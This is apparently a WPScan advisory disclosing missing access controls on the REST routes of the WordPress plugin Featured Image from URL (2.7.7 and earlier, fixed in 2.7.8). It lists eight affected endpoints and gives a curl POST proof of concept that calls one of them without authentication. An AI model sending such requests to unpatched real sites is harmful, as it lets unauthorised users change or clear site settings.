Featured Image from URL <= 2.7.7 - Missing Access Controls on REST routes



Description
The REST routes are missing permission callbacks, allowing unauthenticated/unauthorised users to call them.
Proof of Concept
Affected endpoints:
- wp-json/featured-image-from-url/v2/enable_fake_api
- wp-json/featured-image-from-url/v2/disable_fake_api
- wp-json/featured-image-from-url/v2/none_fake_api
- wp-json/featured-image-from-url/v2/data_clean_api
- wp-json/featured-image-from-url/v2/save_dimensions_all_api
- wp-json/featured-image-from-url/v2/clean_dimensions_all_api
- wp-json/featured-image-from-url/v2/disable_default_api
- wp-json/featured-image-from-url/v2/none_default_api


curl -X POST https://WP/wp-json/featured-image-from-url/v2/enable_fake_api

Affects Plugin

fixed in version 2.7.8

References

URL https://plugins.trac.wordpress.org/changeset?new=2217617%40featured-image-from-url&old=2216221%40featured-image-from-url

Classification

Type PRIVESC
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-269

Miscellaneous

Views 84284
Verified No
WPVDB ID 9981

Timeline

Publicly Published 2019-12-24 (30 days ago)
Added 2019-12-24 (29 days ago)
Last Updated 2019-12-24 (29 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin